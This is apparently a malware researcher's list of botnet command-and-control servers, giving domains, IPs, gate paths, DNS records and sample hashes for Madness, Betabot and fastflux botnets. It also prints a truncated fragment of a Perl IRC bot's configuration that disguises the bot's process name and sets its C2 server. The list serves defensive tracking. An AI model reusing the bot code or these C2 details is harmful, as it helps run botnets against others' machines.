ajw555.myjino.ru (Madness DDOS botnet hosted by avguro.com)

Resolved ajw555.myjino.ru to 81.177.141.241
Server: ajw555.myjino.ru
Gate file: /index.php
This is the same domain as the previous madness botnet.
Hosting info: http://whois.domaintools.com/81.177.141.241
Related md5s (Download sample from Malwr.com)
Madness: c45034111810d1a56ba6b72acc63bdf5

perl.jorgee.nu (5k perl bots hosted in Germany Hurth Intergenia Ag)

Credits to AliSs.

$p = "";
for ($k=0;$k<1300;$k++) {
    $p .= ",5-$k";
}
my @ps = ("ps","syslogd","init");
my $processo = $ps[rand scalar @ps];
$servidor='perl.jorgee.nu' unless $servidor;
my $porta='8080';
my @canais=("#perl");
my @adms=("M","st0n3d","x00","Jack");
my $linas_max=10;
my $sleep=5;
my $nick = getnick();
my $ircname = "x00";
my $realname = `uname -vr`;
my $uname = `uname -a`;
my

shatteredwow.com (Betabot http botnet hosted by limestonenetworks.com)

Resolved shatteredwow.com to 63.143.49.122
Server: shatteredwow.com
Gate file: /beta2/order.php
Alternate domains: modbrandom.netsxyza.dyndns.wsseattleschools.cocnetwork.eltsa.comthex-net.com
Hosting info: http://whois.domaintools.com/63.143.49.122
Related md5s (Download sample from Malwr.com)
Betabot: e5a03d368fd4fca8b45c83a05dab6ced

nomoguz.su (Betabot http botnet hosted by fastflux)

Server: nomoguz.su
Gate file: /SDF9his/yefgvrtu.php
Alternate domain: cooncatcher245.com
The same fastflux setup is also hosting this betabot.
Hosting info:
;; QUESTION SECTION:
;nomoguz.su. IN A
;; ANSWER SECTION:
nomoguz.su. 131 IN A 5.165.17.205
nomoguz.su. 131 IN A 176.194.193.47
nomoguz.su. 131 IN A 66.231.16.101
nomoguz.su. 131 IN A 145.255.33.9
nomoguz.su. 131 IN A 188.0.98.100
nomoguz.su. 131

nigazz.com (Betabot http botnet hosted by besthosting.ua)

Resolved nigazz.com to 194.28.173.217
Server: nigazz.com
Gate file: /neg/order.php
Alternate domain: niggazz.com
Hosting info: http://whois.domaintools.com/194.28.173.217
Related md5s (Download sample from Malwr.com)
Betabot: 7355a0c56919550566ca50e33162f993

fpsfreedom.net (Betabot http botnet hosted by alibabahost.com)

Resolved fpsfreedom.net to 37.221.170.65
Server: fpsfreedom.net
Gate file: /order.php
This seems to be used for increasing website and video stream views: it opens the page hxxp://www.fpsguides.com/hidden in three hidden Internet Explorer windows.
Hosting info: http://whois.domaintools.com/37.221.170.65
Related md5s (Download sample from Malwr.com)
Betabot: 8cc7c93530430201871f07f1be3a26e6

goodfluxetcwow1.com (Fastflux hosting botnet hosted by mnogobyte.ru)

Resolved goodfluxetcwow1.com to 146.255.195.104
Server: goodfluxetcwow1.com
Gate file: /forum/7f4765027f274bbc95328d79fa668b75.php
Alternate domains: goodfluxetcwow2.com b437571f9061b10e5d33c66c83df359e.ru
This is the malware component of a fastflux hosting setup. Once installed on a computer it opens a web server on port 80 and a DNS server on port 53.
Current IPs used by the setup: hxxp://goodfluxetcwow1.com/system/http.php
Page showing example forwarding: hxxp://goodfluxetcwow1.com/system/test.php